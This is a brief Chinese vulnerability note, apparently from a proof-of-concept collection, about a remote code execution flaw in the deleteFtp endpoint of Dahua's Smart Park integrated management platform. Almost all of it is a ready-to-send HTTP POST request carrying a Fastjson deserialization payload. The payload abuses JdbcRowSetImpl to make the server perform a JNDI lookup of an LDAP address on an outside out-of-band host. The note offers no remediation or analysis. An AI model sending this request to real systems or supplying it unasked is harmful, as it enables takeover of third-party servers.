漏洞描述
大华智慧园区综合管理平台 deleteFtp 远程代码执行漏洞
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host:
Content-Type: application/json
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://clmmm09r8kkedikc4900otiwibdhw1i7t.oast.fun","autoCommit":true}}}